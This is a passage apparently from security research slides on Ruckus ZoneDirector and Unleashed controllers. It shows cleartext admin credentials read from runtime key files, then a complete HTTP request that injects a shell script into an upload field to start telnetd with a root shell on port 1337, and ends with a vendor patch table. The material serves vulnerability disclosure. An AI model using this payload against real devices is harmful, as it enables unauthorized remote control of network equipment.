<admin username="admin" x-password="1234" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>

Footprinting on the device: the runtime key files hold the login name and password in clear.

ruckus$ grep -A1 "all powerful" /var/run/rpmkey*
/var/run/rpmkey22:all powerful login name
/var/run/rpmkey22-admin
/var/run/rpmkey22:all powerful login pa...
/var/run/rpmkey22-...

Step 2: log in with the new credentials and hit the patched import-avpport handler with the newline/tab payload.

POST /admin/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: oaMM8EBv1Y
Cookie: -ejs-session-=x236a14bd195e0f136942005c...
Content-Length: 225

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'>
<xcmd cmd='import-avpport' uploadFile='#!/bin/sh\ntelnetd\t-l/bin/sh\t-p1337' type='wlan-maxnums'/>
</ajax-request>


Demo Time #2 ya 


Product       Vulnerable Release   Resolution                            Patch Release Date
ZoneDirector  9.9 and before       Upgrade to 9.10.2.0.84 or newer (*)   N/A
              9.10.x               Upgrade to 9.10.2.0.114               May 29, 2020
              9.12.x               Upgrade to 9.12.3.0.154               May 15, 2020
              9.13.x, 10.0.x       Upgrade to 10.0.1.0.123               May 21, 2020
              10.1.x               Upgrade to 10.1.2.0.306               May 10, 2020
              10.2.x               Upgrade to 10.2.1.0.183               May 15, 2020
              10.3.x               Upgrade to 10.3.1.0.42                May 26, 2020
              10.4.0               Upgrade to 10.4.0.0.98                May 26, 2020
Unleashed     200.6 and before     Upgrade to 200.7.10.202.118           Jun 1, 2020
              200.7                Upgrade to 200.7.10.202.118           Jun 1, 2020
              200.8                Upgrade to 200.8.10.3.278             May 30, 2020


Final thoughts 


• Research = Fun

• Follow-up research = More Fun

• Blog post at alephsecurity.com


Thanks 